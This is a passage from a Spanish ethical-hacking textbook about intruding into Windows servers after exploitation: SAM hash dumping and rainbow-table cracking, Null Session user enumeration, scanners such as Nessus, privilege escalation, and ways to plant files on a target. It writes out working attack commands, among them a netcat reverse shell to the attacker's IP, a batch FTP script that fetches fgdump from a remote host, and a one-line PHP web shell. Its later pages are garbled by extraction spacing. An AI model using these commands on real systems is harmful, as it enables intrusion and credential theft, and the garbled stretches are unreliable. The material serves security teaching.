y así ingresar en el sistema vulnerable remoto mediante una shell reversa.

191

Hacking Etico - [PDF Document] (195)

Metasploit ofrece una facilidad extrema de intrusión si se dan ciertas condicio-nes en el objetivo y, gracias a su interfaz gráfica, cualquiera que cuente con losmínimos conocimientos puede lograr una sesión remota. Lógicamente, no sólolos profesionales éticos utilizan esta plataforma de trabajo ya que, al ser gratui-ta, cae en manos de muchos jóvenes con tiempo de sobra, delincuentes y curio-sos de todo el mundo.

Prompt1. Luego de la ejecución del exploit remoto, una consolainteractiva (prompt) se pone a disposición del atacante, que aquí puede verel contenido del archivo c.txt que ha escrito en el directorio raíz (C:\) luegode haber plantado un archivo como prueba de su paso por el sistema objetivo.

También lo podría haber hecho a mano de modo menos automatizado bajando dosexploits a una shell Linux (www.securityfocus.com/data/vulnerabilities/exploits/

192

Existe hardware cuya finalidad es autentificar accesos. Por ejemplo, la empresa Hy-net (www.hynet.com.ar) comercializa servicios y productos para organizaciones einstituciones, ya sean soluciones de Acceso remoto seguro (SSL+VPN) o hardwareorientado a seguridad (Juniper, entre otras marcas).

Hardware de seguridad

Hacking Etico - [PDF Document] (196)

Win2000-MS05-039.c y www.securityfocus.com/data/vulnerabilities/exploits/HOD-ms05039-pnp-expl.c), compilándolos y ejecutándolos contra el objetivo.

Prompt2. En esta figura, luego de haber dado de alta un usuario y ponerlo en el grupode administradores, se comprueba que éste figura en la lista de usuarios

mediante el comando net users y luego se corrobora el nombre de la máquina.

Una vez dentro, el atacante puede llevar a cabo todo lo que el administrador po-dría hacer y más aún, depende de su habilidad y conocimiento técnico.

Hash. Aquí el supuesto atacante colocó el resultado del dumpeo (logrado a la vieja maneracon www.foofus.net/fizzgig/fgdump/ o con el comando hashdump de la “extension priv”

desde la consola de Metasploit -meterpreter-) del SAM , es decir, las cuentas de sistema ci-fradas, en el servidor web IIS para que otro atacante externo –o él mismo– las copie vía

Internet sacándolas de allí. Acto seguido, las borraría de modo seguro.

193

Hacking Etico - [PDF Document] (197)

¿Qué hace el atacante una vez que obtiene las cuentas de sistema hasheadas?Las descifra, la manera más rápida que nunca gracias al poder de procesamiento denuestras PCs y las técnicas disponibles. Antes, en el capítulo que hablamos sobre bru-te force, conocimos el método que utiliza Rainbow Tables. Aplicaremos ahora estatécnica criptográfica y veremos toda su potencia en una simple demostración. Comoprimer paso, descargamos el cliente uTorrent de http://download.utorrent.co-m/1.7.7/utorrent.exe y luego bajamos de http://rainbowtables.shmoo.com-/rainbow_tables-alpha_num_ sym32_space.torrent, las Rainbow Tables indi-cadas para el caso.Tenemos que ser pacientes con la descarga de las Rainbow Tables ya que, comoocupan más de 30 GB, tardarán aproximadamente una semana si disponemos deun mega por segundo de bajada y no apagamos la PC. El archivo descargado estácomprimido en formato lzma, que debemos descomprimir con la utilidad que en-contramos en http://rainbowtables.shmoo.com/lzma.exe.

Preparativos. Una vez bajadas las Rainbow Tables, hay que descomprimirlasuna a una para poder utilizarlas. Esta ardua tarea nos llevará unas cinco horas, peronos ahorrará mucho tiempo al tratar de descubrir los passwords cifrados del archivo SAM.

Para descomprimir el primer archivo el comando es: C:\>lzma d lm_alpha-numeric-symbol32-space#1-7_0_15200x67108864_0.rt.lzma lm_alpha-numeric-symbol32-space#1-7_0_15200x67108864_0.rtLas tablas descomprimidas pasarán a tener 64 gigabytes, por lo que debemos corroborarsi contamos con ese espacio en el disco.Luego bajaremos RainbowCrack de www.antsight.com/zsl/rainbowcrack/rainbowcrack-1.2-win.zip, lo descomprimiremos en C: y, una vez que lo hicimos,

194

Hacking Etico - [PDF Document] (198)

vamos a configurar el archivo charset.txt que se encuentra dentro del directorioC:\rainbowcrack-1.2-win. Abrimos ese archivo y le agregamos, al final de la listade charsets que contiene, la línea: alpha-numeric-symbol32-space = [ABC-DEFGHIJKLMNOPQRSTUVWXYZ0123456789 !@#$%^&*() -_+=~`[]{}|\:;”’<>,.?/ ]. Si no la agregamos, RainbowCrack nos dará un error.Su utilización es fácil. Colocamos en ese mismo directorio (C:\rainbowcrack-1.2-win), un archivo llamado hash.txt que contiene los hashes del sistema extraídos delobjetivo comprometido. Luego, ejecutamos la consola de comandos (prompt) y nosubicamos en ese directorio, mientras que las tablas o archivos .rt deben estar en:C:\Downloads\alpha_num_sym32_space. Al finalizar todo ello, ejecutamos:rcrack C:\Downloads\alpha_num_sym32_space\*.rt -f hash.txt.

Resultado. Luego de una espera de tan sólo minutos,el programa RainbowCrack, con la ayuda de los 64 Gigabytes

de Rainbow Tables, descifró la totalidad de las cuentas de sistema del objetivo.

195

En el sitio www.sans.org/top20/, podemos encontrar un ranking sobre los 20 riesgosde seguridad más importantes. Entre ellos, se abarca tanto el lado del cliente como eldel servidor, las políticas de seguridad y el personal, los dispositivos, redes, aplicacio-nes y los problemas desconocidos o nuevos (0day).

Top 20

Hacking Etico - [PDF Document] (199)

Null Sessions sobre Netbios

A continuación, veamos las formas clásicas de comprometer un servidor Windows:

• SQL Injection en su motor de base de datos o en una aplicación de terceros enel servidor.• Comprometer su contexto y, de ese modo, poder esnifear passwords o creden-ciales que están en tránsito hacia fuera o hacia dentro del escenario.• Explotación de vulnerabilidad en alguna aplicación cliente con interacción humana.• Mediante exploits remotos (o a mano) al sistema en alguno de sus servicios o enlas aplicaciones de terceros instaladas en él.• Redirigiendo el tráfico hacia nosotros en una red interna y capturando informa-ción sensible o passwords. Ataque del tipo mitm (man in the middle).

Pero existe otra forma. Conseguir usuarios válidos en el sistema para utilizarlos lue-go en los servicios de autentificación (propios o de terceros) mediante la informa-ción que se puede extraer a través de Null Sessions. ConNetbios (Network Basic Input-Output System) presente, hay una gran posibilidad de conseguir información de estos usua-rios. Netbios es una interfaz para procesos de red desarrollada en principio por IBM, y suutilización más común se da en la implementación de recursos compartidos en red o bienpara que las aplicaciones interactúen entre sí a través de una red. ¿Qué importancia tieneesto? Demasiada, ya que a través de Netbios podríamos:

• Extraer el SID (Security Identifier), un identificador alfanumérico que identifica unobjeto (característica de seguridad de los OS Windows a partir de NT) en una red.El objeto puede ser un usuario o un grupo de ellos.• La lista de usuarios locales de sistema.• La lista de usuarios del dominio.• Privilegios.• Última fecha en la que se logueó un usuario (dato muy interesante para la inge-niería social).• Los hosts (máquinas) que conforman la red.• Nombre del host.• Sistema operativo y versión.• Recursos compartidos, de datos y de administración.• Políticas de passwords en detalle, como expiración de cuentas, passwords cam-biados, usuarios logueados, usuarios que nunca se loguearon.

196

Hacking Etico - [PDF Document] (200)

Todos estos datos pueden obtenerse juntos y en un prolijo reporte a través de unescaneo de Tenable Nessus 3 o GFI LANguard, como también a mano, con las uti-lidades que veremos a continuación.

Languard. Pantalla del software GFI LANguard mostrándonoscomo resultado la información obtenida a través de Netbios:

los usuarios, los nombres Netbios, los recursos compartidos, políticasde passwords y un listado de vulnerabilidades extra, entre otras cosas.

userdump.exe: extrae uno a uno los usuarios y sus datos. Si ejecutamos “C:\>user-dump \\200.XX.XX.233 Administrador 500, lograremos mucho más que los deta-lles de la cuenta de administrador: la lista completa.

C:\>userdump \\200.XX.XX.233 Administrador

UserDump v1.11 - [emailprotected]

Querying Controller \\200.XX.XX.233USER INFOUsername: AdministradorFull Name:Comment: Cuenta para la administracion del equipo o dominio

197

Hacking Etico - [PDF Document] (201)

User Comment:User ID: 500Primary Grp: 513

Privs: Admin PrivsOperatorPrivs: No explicit OP Privs

SYSTEM FLAGS (Flag dword is 66049)User’s pwd never expires.

MISC INFOPassword age: Fri Nov 16 11:27:21 2007LastLogon: Thu Mar 06 13:29:15 2008LastLogoff: Thu Jan 01 00:00:00 1970Acct Expires: NeverMax Storage: UnlimitedWorkstations:UnitsperWeek: 168Bad pw Count: 0Num logons: 754Country code: 0Code page: 0Profile:ScriptPath:Homedir drive:Home Dir:PasswordExp: 0

userinfo.exe: Extrae los datos del usuario brindado.

C:\>userinfo \\200.XX.XX8.233 matiUserInfo v1.5 - [emailprotected] Controller \\200.XX.XX.233USER INFOUsername: matiFull Name: matiComment:User Comment:User ID: 1020Primary Grp: 513

198

Hacking Etico - [PDF Document] (202)

Privs: User Privs

OperatorPrivs: No explicit OP Privs

SYSTEM FLAGS (Flag dword is 66049)User’s pwd never expires.

MISC INFOPassword age: Tue Feb 19 17:24:30 2008LastLogon: Tue Feb 26 14:23:57 2008LastLogoff: Thu Jan 01 00:00:00 1970Acct Expires: NeverMax Storage: UnlimitedWorkstations:UnitsperWeek: 168Bad pw Count: 0Num logons: 0Country code: 0Code page: 0Profile:

ScriptPath:Homedir drive:Home Dir:

PasswordExp: 0Friday 111111111111111111111111Saturday 111111111111111111111111

user2sid.exe: Extrae el SID de determinado usuario.

C:\>user2sid \\200.XX.XX.233 “Administrador”

199

Si queremos conocer más detalles de Netbios y de su implementación en Windows XPy en la familia de sistemas 2003, en http://technet.microsoft.com/en-us/library/b-b727013.aspx encontraremos un texto técnico de Microsoft.

Netbios en Windows

Hacking Etico - [PDF Document] (203)

S-1-5-21-1177238915-839522115-854245398-500Number of subauthorities is 5

Domain isLength of SID in memory is 28

bytesType of SID is SidTypeUser

Brute. Aplicando brute force con elprograma NetBrute a un recurso com-partido con un usuario conocido a tra-vés de Netbios. En este ejemplo –paracorroborar el funcionamiento del pro-grama– tras 197 intentos se pudo darcon el password, igual al nombre (sabi-do de antemano). Éste es sólo un ejem-plo con herramientas win32, pero también se puede utilizar Hydra.

sid2user.exe: Convierte el SID en determinado usuario.

C:\>sid2user \\200.xx.XX.233 5 21 1177238915 839522115 854245398 500

Name is AdministradorDomain isType of SID is SidTypeUser

C:\>sid2user \\200.xx.XX.233 5 21 1177238915 839522115 854245398 501

Name is InvitadoDomain is Type of SID is SidTypeUser

C:\>sid2user \\200.xx.XX.233 5 21 1177238915 839522115 854245398 1000

Name is TsInternetUserDomain isType of SID is SidTypeUser

200

Hacking Etico - [PDF Document] (204)

C:\>sid2user \\200.xx.XX.233 5 21 1177238915 839522115 854245398 1001

Name is IUSR_1

Domain isType of SID is SidTypeUser

C:\>sid2user \\200.xx.XX.233 5 21 1177238915 839522115 854245398 1002Name is IWAM_Domain isType of SID is SidTypeUser

La última porción de números del string corresponde al usuario, en donde 500siempre será la cuenta Administrador o Administrator por defecto.

enum.exe: realiza varias acciones sobre el objetivo, especialmente extraer informa-ción.

C:\>enumusage: enum [switches] [hostname|ip]

-U: get userlist-M: get machine list-N: get namelist dump (different from -U|-M)-S: get sharelist-P: get password policy information-G: get group and member list-L: get LSA policy information-D: dictionary crack, needs -u and -f-d: be detailed, applies to -U and -S-c: don’t cancel sessions-u: specify username to use (default “”)-p: specify password to use (default “”)-f: specify dictfile to use (wants -D)

C:\>enum -U 200.xx.XX.233server: 200.xx.XX.233getting user list (pass 1, index 0)... success, got 18.Administrador ASPNET abares etoletti cus allejo acoInvitado IUSR_xxxx IWAM_xxxx allaglio mati hurchi erra

NetShowServices pdelpino sgomez TsInternetUser

201

Hacking Etico - [PDF Document] (205)

cleaning up... success.

Otras herramientas de línea de comando (prompt DOS) recomendables son:usrstat.exe, showgrps.exe, además de las gráficas R3x y netbrute.exe. De ese mo-do, nos familiarizamos con este servicio y su muy útil información. Todas estasherramientas las podremos descargar de www.hackingetico.com/SMBtools.zip.

R3X. Pantalla de la aplicación gratuita R3xlistando shares (recursos compartidos vía netbios) y nombres de usuarios.

Comandos NETPara usar estos comandos, es importante que deshabilitemos momentáneamente elfirewall que tengamos para que éste no filtre los intentos de conexión del protoco-lo cuando es hacia objetivos remotos.

202

Básicamente, el comando nmblookup permite hacer consultas acerca de los nombres Net-Bios en una subred. Sin opciones, el comando traduce un nombre NetBios a dirección IP. Susintaxis es: nmblookup [opciones] <nombre_netbios>. Podemos encontrar más detallesen www.ispcmw.rimed.cu/sitios/digbiblio/cont/EI/SO_Linux/Avanzado-html/node22.html.

Comando nmblookup de Linux

Hacking Etico - [PDF Document] (206)

• Establecer una conexión nula (null session) y ver los recursos compartidos de unobjetivo remoto:C:\Documents and Settings\user>net view \\200.XX.XX.233Error de sistema 5.Acceso denegado.

Esto sucede porque primero hay que establecer la sesión nula de la siguiente mane-ra: C:\Documents and Settings\user>net use \\200.XXXX.233\ipc$ “”/user:””Se ha completado el comando correctamente.

Cuando la conexión nula se ha establecido, ejecutamos nuevamente el comando:

C:\Documents and Settings\user>net view \\200.XX.XX.233

Recursos compartidos en \\200.XX.XX.233

Nombre de recurso compartido Tipo Usado como Comentario———————————————————————————————————-Backup Discoderel Discofose DiscoGrupos DiscoPUBLICO DiscoUSUARIOS DiscoVIDEOS DiscoSe ha completado el comando correctamente.

• Para ver las conexiones existentes:

C:\>net useSe registrarán las nuevas conexiones.

Estado Local Remoto Red

————————————————————————————————Conectado \\200.XX.XX.233\IPC$ Red de Microsoft WindowsSe ha completado el comando correctamente.

• Para eliminar una conexión existente:

203

Hacking Etico - [PDF Document] (207)

C:\>net use /delete \\200.XX.XX.233\IPC$\\200.XX.XX.233\IPC$ ha sido eliminado.• Para mapear una unidad compartida en el servidor objetivo como nuestra uni-dad H. Ésta es una buena forma de poner a mano información. Por ejemplo, siestamos dentro de una red interna y tenemos que acercar recursos que se en-cuentran en servidores en otro punto del dominio y sólo podemos ejecutar co-mandos de red (de modo ciego) a través del servicio SQL server.

C:\>net use h: \\200.XX.XX.233\Backup mati /user:matiSe ha completado el comando correctamente.

Unidad. Aquí se ve cómo, con el comando de mapeo,se configuró el recurso compartido remoto como si fuera nuestra unidad H.

• Para administrar recursos compartidos locales:

C:\>net share

Nombre Recurso Descripción

204

Si queremos más información sobre este tipo de comandos, podemos visitar www.it-q.edu.mx/vidatec/espacio/aisc/windowsnt/ComandosNET.htm o ejecutar net en nues-tro prompt DOS para obtener más variantes.

Más comandos

Hacking Etico - [PDF Document] (208)

————————————————————————————————ADMIN$ C:\WINDOWS Admin remotaC$ C:\ Recurso predeterminado

IPC$ IPC remotaSe ha completado el comando correctamente.

C:\>net share C$ /delC$ ha sido eliminado.

C:\>net share admin$ /deladmin$ ha sido eliminado.

C:\>net share admin$El recurso admin$ ha sido compartido.

• Para ver los usuarios del host:

C:\>net user

Cuentas de usuario de \\LABORATORIO—————————————————————————————AdminLAB Asistente de ayuda InvitadoSUPPORT_388945a0 UserLAbSe ha completado el comando correctamente.

Herramientas recomendadasVeamos ahora una serie de herramientas útiles para realizar la búsqueda de vulne-rabilidades y el posterior ataque.

Tenable Nessus

Antes de proceder a utilizar Metasploit contra un objetivo, la acción más lógica es la de en-contrar de antemano sus vulnerabilidades (es recomendable hacerlo amano primero) y, pre-vio a ello, saber de qué sistema se trata. Como vemos, por algo están definidos en etapas losproyectos de seguridad en cuanto a chequeos, ya que el orden y la metodología son funda-mentales. Tenable Nessus es un buscador de vulnerabilidades muy bueno y si bien

205

Hacking Etico - [PDF Document] (209)

en algunos reportes genera falsos positivos (las herramientas están hechas por hu-manos), está en la pericia del analista reconocerlos y eliminarlos para no reportar-los. A diferencia de Metasploit, Nessus busca vulnerabilidades, pero no trata deexplotarlas. Hace una revisión de éstas a través de los casi 21000 plug-ins que po-see actualmente y, en caso de encontrarlas, las mostrará en detalle en el reporteque presenta al final del escaneo. ¿Qué pasa con las que no descubre? Para elloestá nuestro conocimiento y la revisión manual de cada uno de los servicios, apli-caciones y entorno del objetivo.

Bajar. Sitio de descarga de Tenable Nessus.

Esta herramienta es de libre descarga. Solamente es necesario ir a www.nessus.org/download/ y elegir de la lista la versión que corresponde al sistema operativo que uti-licemos. Es muy recomendable conocer la sección de documentación de esta herra-

206

Desde el año 1999, la editorial Hacking Exposed (www.winhackingexposed.com) ha pu-blicado libros dedicados a mostrar las metodologías del hacking, sus técnicas más co-munes y sus herramientas. Con ellos, podremos aprender a defendernos de todas esasamenazas.

Editorial especializada

Hacking Etico - [PDF Document] (210)

mienta ya que posee todas las guías necesarias para el usuario. Además, podemos uti-lizar las listas de correo que encontramos en http://list.nessus.org para interactuarcon usuarios profesionales y resolver las dudas o problemas que se nos presenten.

Politicas. Esta nueva y reciente versión posee el sistema Cliente/Servidortal como tenía en Linux y FreeBSD. Ésta es la pantalla para la edición de políticas.

207

Hacking Etico - [PDF Document] (211)

Seteo. Pantalla del módulo para agregar usuarios en Nessus.

Al instalar el programa, luego de aceptar la licencia de software mediante un clic, debemoscompletar el formulario con nuestros datos. Es importante que el e-mail que ingresemossea real ya que allí nos será enviado el código de activación. Si queremos activarlo offlinedeberemos ir -con el código que nos mostró al final de la instalación a realizar el trámite ahttp://plugins.nessus.org/offline.php. Allí recibiremos un archivo de registro y uno paraactualizar los plug-ins.Otra forma es ejecutar el archivo:C:\Archivos de programa\Tenable\Nessus\Registration.exe y allí colocar el códi-go. Una vez instalado, para agregar un usuario tenemos que ejecutar el archivo:C:\Archivos de programa\Tenable\Nessus\UserMgmt.exe.

Una vez que hemos agregado el usuario, el cliente se conectará al server con eseusuario y procederá a realizar la búsqueda de las vulnerabilidades.Para configurar el servidor en donde se conectará el cliente debemos ejecutar:C:\Archivos de programa\Tenable\Nessus\ServerConfig.exe.

Podemos ver todo el proceso en el video de 12 minutos que encontramos enhttp://cgi.tenablesecurity.com/demos/nessus-3.2-intro/nessus-3.2-in-tro.html.

Consejos.

Si deseamos instalarlo en FreeBSD 5, debemos asegurarnos de tener instaladoslos ports M4 y bison, si no, nos dará error al querer utilizarlo. Ya existe una ver-sión para FreeBSD 6 y 7. Por otro lado, si por alguna razón utilizamos una ver-sión anterior (3.1), existe una configuración especial para Windows XP SP2, yaque se pueden producir falsos positivos por las características de TCP/IP im-

208

Hacking Etico - [PDF Document] (212)

plementadas en ese service pack por Microsoft (http://technet.microsoft.co-m/es-ar/library/bb457156(en-us).aspx). Si no es posible instalarlo en un Win-dows 2003, deberemos configurarlo en XP de la siguiente manera:

Max number of hosts: 10*Max number of security checks: 4Max number of packets per second for a port scan: 50

Luego, en C:\Archivos de programa\Tenable\Nessus\config, editamos el archivoconfig.default.xml y, en la sección SYN Scan, cambiamos el 500 a 50 de esta for-ma: <value><![CDATA[50]]></value>. (*Fuente: www.oreillynet.com)

209

En el sitio http://securityvulns.com/exploits/, podemos encontrar una extensa base dedatos con información sobre vulnerabilidades y códigos fuente (proof of concept ex-ploits).

Vulnerabilidades

Hacking Etico - [PDF Document] (213)

Conexión. Este servidor será el que reciba la conexión del clienteNessus para iniciar el chequeo. Allí podemos especificar dirección IP y puerto.

CORE IMPACT 7.5

Esta primera plataforma automatizada de penetration testing es, simplemente, ex-celente (www.coresecurity.com/products/coreimpact/). Este software es comer-cial y podemos participar de sus webcasts logueándonos en www.coresecurity.com/?module=ContentMod&action=allnews&type=webcasts. Su evolución y sudesarrollo han sido mejorados versión a versión.Posee 667 exploits (contra 230 de Metasploit) y 467 módulos delimitados en:• Agentes • Deniales de Servicio • Exploits • Exportar-Importar • InformationGathering • Mantenimiento • Misceláneas • Mis Macros • Reportes • RPT• Ejemplos • Herramientas de servidor • Shells.

210

Hacking Etico - [PDF Document] (214)

Core1. Pantalla de inicio de CORE IMPACT en la quepodemos ver la cantidad de exploits por sistema operativo, las

actualizaciones mes a mes de la herramienta y los módulos por categoría.

Core2. En esta pantalla, podemos ver el panel con

211

Podemos encontrar más recursos y herramientas de Netcat para Windows en www-.vulnwatch.org/netcat/nc111nt.zip, y de Netcat para Linux en http://netcat.sourceforge-.net. Además, en http://crysol.inf-cr.uclm.es/node/28, hay un tutorial muy simple.

Más recursos

Hacking Etico - [PDF Document] (215)

sus módulos desplegados. No sólo son exploits, ya que poseeuna buena cantidad de herramientas para extraer información del objetivo.

Los siguientes son módulos RPT (Rapid Penetration Test):• RPT view (client-side RPT): Client-side Information Gathering, Client-side At-tack and Penetration, Local Information Gathering, privilege escalation, Cleanup, client-side report generation. • Network RPT: Network information gathe-ring, Network and attack penetration, Local information gathering, Privilegeescalation, Clean Up, Network report generation. • WebApps RPT: Webappsinformation gathering, WebApps Attack and penetration, WebApps Report ge-neration.

IMMUNITY CANVASÉsta es otra plataforma de trabajo muy interesante, cargada con algo más de 150exploits. También es una aplicación comercial, y su dirección es www.immunitysec-.com/products-canvas.shtml.

.GUI. Canvas ejecutado en Windows

(requiere Python). La versión actual es la 6.32.En www.immunitysec.com/products-documentation.shtml, podemos ver, através de videos, cómo funciona esta herramienta.Posee los siguientes módulos:• Exploits: Locals, Windows, Unix, Web Exploits, Clientside. • Commands• Tools • Recon • DoS • Listener Shells • Servers • Importexport • Configuration.

212

Hacking Etico - [PDF Document] (216)

Para finalizar, es interesante la revisión de productos de seguridad que podemosencontrar en www.scmagazineus.com/Vulnerability-assessment-2007/GroupTest/16/. Allí hay que hacer click en el nombre de cada uno de los progra-mas para ver los detalles de su análisis. Todas estas herramientas tienen módulos yexploits que las hacen únicas que, utilizadas a conciencia y en integración, ayuda-rán a realizar un muy buen chequeo exhaustivo.De todos modos, la herramienta más importante que podemos tener es nuestramente, y el mejor método va a seguir siendo, por años, corroborar las vulnerabili-dades a mano con tiempo y detenimiento. La automatización es buena siempre ycuando comprendamos qué es lo que estamos haciendo (sumado a un tipo deentorno que puede ser numeroso y asi lo requiera) y qué cosas estamos dejando dever como resultado de ello.

El intruso adentro

Una vez que el intruso logra estar dentro del servidor, en la shell de comandos oprompt, ¿qué sucede? En principio, hay que ver qué intenciones y habilidades tie-ne éste y, por otro lado, el estado o contexto del escenario en cuanto a seguridadinformática y administración. No es lo mismo un intruso que sólo deforma un si-tio web que aquel que quiere permanecer invisible a los ojos del administrador ydesea interceptar la información de la organización o institución, o bien usar eseservidor para atacar a otros de la red interna.Al primero de ellos, se lo puede mantener alejado con administración segura y de-dicada, pero al segundo va a costar un poco más. La proacción para no padecerlodebe incluir concientización de los empleados de la organización, ethical hacking,seminarios de seguridad para el personal (basados en el sistema de información dela organización), entrenamiento en ingeniería social, políticas de seguridad, alinea-mientos a normativas, controles de registros de sistema, administradores con per-fil de seguridad y, por último, planes técnicos y legales de reacción a incidentes.Es muy posible que un intruso hábil lleve a cabo las siete acciones que veremos acontinuación, válidas para todos los sistemas operativos utilizados en servidores.

Elevación de privilegios

El atacante intentará, en principio, elevar su privilegio de usuario si no es que ya po-see uno alto por la explotación de una vulnerabilidad de modo remoto (corriendo conelevados privilegios claro). Intentará ejecutar comandos como usuario root (uid0) enUnix/Linux o Administrador/Administrator o System en Windows. Sea cual sea elnombre de la cuenta, lo que realmente importa es el privilegio que esa cuenta tengadentro del sistema operativo. La finalidad de esto es poder realizar cualquier tarea den-tro del sistema sin impedimentos ni limitaciones en cuanto a comandos, lectoescritu-

213

Hacking Etico - [PDF Document] (217)

ra, ejecución o administración de procesos y servicios.Lo normal es que utilice o intente utilizar un exploit local para explotar algunavulnerabilidad existente conocida o que la descubra en esa sesión de ataque. Tam-bién puede ser a través de un descuido, encontrando información sensible en logso archivos, por ejemplo. En milw0rm (www.milw0rm.com) es posible encontraruna lista de exploits locales para Windows a la fecha. Como podemos ver en la lista,es posible escalar a través de una aplicación, servicio del sistema, servicio de una apli-cación de terceros o kernel. A esto, hay que sumarle los exploits que son privados(0day no públicos), ya sea de empresas de seguridad, programadores de exploitsque desean no hacerlo públicos o quien sea que los haya conseguido o comprado.

Veamos el output (salida de pantalla) del preparado de un archivo que explota unafalla de Office 2003 en la mayoría de las plataformas Windows.

C:\>local

Microsoft Office .WPS Stack OverflowAdam Walker (c) 2007

[+] Targets:

(1) Windows XP SP2 ntdll.dll deUsage: wps.exe <target> <file>

C:\>local 1 doc[+] Creating WPS header...[+] Copying addr && nops && shellcode...[+] .WPS file succesfully created!

Maneras de subir o de crear un archivo en el objetivoUn atacante tiene varias formas de hacer llegar un archivo dentro del servidor objetivo:• Escribiéndolo o creándolo con el editor vi.• Descargándolo de la Web mediante una sesión gráfica a través de un browser odesde una shell a través de lynx o wget.Wget para Windows: www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary-.zip. Lynx para Windows: http://fredlwm.googlepages.com/lynx.zip.

214

Hacking Etico - [PDF Document] (218)

Editor. VVii, una he rra mien ta na ti va de Li nux. Pa ra Win dowsexis ten al gu nas ver sio nes pa ra lí nea de co man do e in ter faz grá fi ca.En www.t ho mer .com /vi /vi.html #ver sions, es tán to das las dis po ni bles.

• Co pián do lo co mo tex to y com pi lán do lo (con vi o con al gún clien te de co ne xiónti po Se cu reCRT). Po de mos en con trar re cur sos en www .vandy ke .com.• Su bién do lo por re cur so com par ti do: Puer to 139: \\XXX .XX.144.147\c$\I net pub\s cripts \net ca t.e xe se su be.Puer to 80: http://XXX.XX.144.147/s cripts /net ca t.e xe se eje cu ta.• Uti li zan do FTP de mo do di rec to des de la con so la o en mo do batch:

C:\>e cho open 200.0.0.0>e.txtC:\>e cho usua rio>>e.txtC:\>e cho pass wor d>>e.txtC:\>e cho bi nar y>>e.txtC:\>e cho get fg dum p.e xe>>e.txtC:\>e cho get wge t.e xe>>e.txtC:\>e cho bye>>e.txtC:\>ftp -s:e.txt

FTP eje cu ta, en mo do se cuen cial, to dos los co man dos y da tos con te ni dos en elar chi vo e.txt (http ://sup port .mi cro soft .com/kb/96269).

215

Hacking Etico - [PDF Document] (219)

• Uti li zan do al gu na he rra mien ta que apro ve che una vul ne ra bi li dad en el ob je ti vopa ra es cri bir un ar chi vo y com pi lar lo. Por ejem plo, SQL nin ja, a tra vés de SQLIn jec tion (http://sql nin ja .sour ce for ge .net/sql nin ja-how to.html#ss2.6), su -be ar chi vos es cri bién do los vía re quests http GET y POST.• Em plean do un ser vi dor tftp en la shell ata can te y el clien te tftp des de el ob je ti vo(GET ar chi vo). Po de mos en con trar un re cur so en www .so lar winds .com /pro -ducts /free tools /free_tftp _ser ve r.aspx.• Vía PHP shell (o PHP script <? sys tem($cmd); ?>) o ASP Shell, es cri bien doo su bien do ar chi vos más allá del path del si tio hos tea do en el ser vi dor. Re cur -so: ww w.es nips .com /web/phps hells.• En vián do lo por e-mail a al gu na ca si lla de co rreo del ser vi dor. En www .win zip .co m/e s/uuen co de.htm, en con tra re mos una for ma fá cil de de co di fi car ad jun -tos de e-mails (guar dan do el có di go del ar chi vo ad jun to al e-mail co mo un ar chi -vo de ex ten sión .uue des de el pri mer ca rác ter lue go de la se gun da co mi lla do blede fi le na me has ta el sím bo lo = del fi nal pa ra lue go abrir lo con Win zip).• Uti li zan do net cat si es que és te es tá pre sen te en el ob je ti vo:$ nc -l -p 2000 > ex ploit.txt (en la má qui na ob je ti vo).$ nc ip-des ti no 2000 < ex ploit.txt (des de la shell del ata can te).

Bús que da de in for ma ción sen si ble y aná li sis

Un in tru so tam bién bus ca rá sa ber to do lo re fe ren te al sis te ma, su con tex to, sususua rios y ser vi cios, dis po si ti vos de se gu ri dad, logs, fil tra do y lo ca li za ción de losac ti vos de la or ga ni za ción. La fi na li dad de es to es re co no cer el te rre no, las po si bi -li da des de ser des cu bier to, de de jar ras tros y de ex plo tar el sis te ma o la red, en con -trar in for ma ción sen si ble en el sis te ma ope ra ti vo y en con trar el ac ti vo de sea do olo grar el ob je ti vo im pues to.Pa ra ello, el in tru so se pue de va ler del co no ci mien to pre vio del sis te ma ope ra ti vo(de ter mi na dos logs, car pe tas de usua rios, re gis tros va rios, pro ce sos), los co man -dos na ti vos dis po ni bles del sis te ma ope ra ti vo o uti li da des exis ten tes de ad mi nis -tra ción co mo el Re sour ce kit de Win dows 2000/2003 (www .pe tri .co.il /down -load _free _res kit _tools.htm), por ejem plo, o las Ps tools.

216

Lo gra mos es to si, en nues tro prompt DOS (win dows) o en la shell (Li nux), eje cu ta mosnc -v -l -p 7878 y en la má qui na ob je ti vo lo si guien te: C:\i net pub\s cripts\n c.e xe ip.s he -ll.a ta can te 7878 —e cm d.e xe, en Win dows y /tmp/nc ip.s he ll.a ta can te 7878 -e /bin /bash,en Li nux.

Re ver se shell con Net cat

Hacking Etico - [PDF Document] (220)

El in tru so se pre gun ta rá co sas co mo qué pro ce sos es tá co rrien do el ser vi dor en es -te ins tan te. Pa ra sa ber lo, pue de eje cu tar pu lis t.e xe y se en te ra rá. Su pon ga mos queel ata can te ve un pro ce so en ese lis ta do y lo iden ti fi ca con un an ti vi rus que va a de -tec tar al gún ar chi vo su yo. Se pre gun ta: ¿de bo ma tar ese pro ce so? En ca so afir ma -ti vo, lo ha rá con ki ll.e xe. Pa ra ave ri guar có mo es la con fi gu ra ción de red, eje cu ta rálos co man dos rou te print, ip con fig, sys te min fo y los co man dos net pa ra ver lasmá qui nas del do mi nio y los usua rios. Por otro la do, bus ca rá de ter mi na dos ar chi voscon el co man do dir. Por ejem plo, pue de bus car ar chi vos en to do el dis co -in clu sosub di rec to rios- con el atri bu to Ar chi vo (ge ne ra dos o ma ni pu la dos por los usua rios)y de jar el re sul ta do en ar chi vos.txt con el co man do dir /s /aa>ar chi vos.txt. Po de mos ver más ejem plos en htt p://es .wi ki pe dia.org /wi ki /Dir _(Co man do _de -_DOS). Si de sea mos sa ber más acer ca del com por ta mien to de di fe ren tes in tru sos,es re co men da ble in ves ti gar so bre ho ney pots en Goo gle. Ade más, po de mos en con -trar ex ce len tes he rra mien tas gra tui tas de ad mi nis tra ción, au di to ría y se gu ri dad en si -tios co mo www.nt se cu rity .nu /tool box/, www .mi cro soft .com/s pain /tech net/sy -sin ter nal s/u ti li ties/Ps Tools.mspx, www .founds to ne .co m/us /re sour ces-free-tool -s.asp.

Cap tu ra de pa que tes y con tra se ñas

